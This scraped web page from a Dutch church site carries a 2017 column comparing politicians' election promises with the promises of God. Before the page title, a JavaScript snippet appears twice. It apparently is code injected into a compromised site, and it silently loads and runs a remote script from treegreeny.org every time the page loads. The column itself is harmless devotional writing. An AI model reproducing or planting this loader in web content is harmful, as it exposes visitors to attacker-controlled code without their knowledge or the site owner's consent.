;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Verkiezingsbelofte - PKN Damwâld

Verkiezingsbelofte

Gepubliceerd op: dinsdag 14 maart 2017

We zitten er midden in: de verkiezingscampagne. En stuk voor stuk bieden de partijen en de leiders grote plannen voor verbeteringen: goede zorg, minder belastingen, beter onderwijs, lagere pensioenleeftijd…..

Het gaat om grote belangen, want de winnaar(s) mogen straks het land regeren voor de komende vier jaar. En het is prachtig, die ambitie, als het maar oprecht is. Oprechte belangstelling voor de medemens, voor verbetering, innovatie, het milieu. En niet alleen om macht, een eigen plekje in het pluche, of het kunnen doorvoeren van eigen belangen.

En natuurlijk weten we, dat veel van die mooie woorden niet meer dan dat zijn: mooie woorden. Want natuurlijk moet er straks – als ze echt mogen regeren – opnieuw worden gerekend, gepuzzeld en geschoven met budgetten, worden er compromissen gesloten en plannen vooruitgeschoven of van tafel geveegd. Al te vaak zijn we teleurgesteld geweest in de uitkomsten van de verkiezingen, in de resultaten van een kabinet en in de harde realiteit dat al die mooie beloften ook gewoon geld kosten, ons geld. Veel te veel mensen, partijen, organisaties, bedrijven, omringende landen en samenwerkingsverbanden zorgen voor tegenstrijdige belangen, conflicten, strijd om grondstoffen, land en macht.

In al die hectiek, zorgen en twijfel is er gelukkig één echte wereldleider, die geen loze beloften doet: met een goed verkiezingsprogramma waarin de leeuw en het lam samen spelen, er geen ziekte en honger en dood meer zal zijn. Eén, die zich altijd aan zijn Woord houdt, oprecht met ons begaan is, wat we zelf ook doen of laten. Gelukkig zal Hij aan het eind van de strijd overwinnen. Lees Zijn verkiezingsprogram er nog maar eens op na!

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns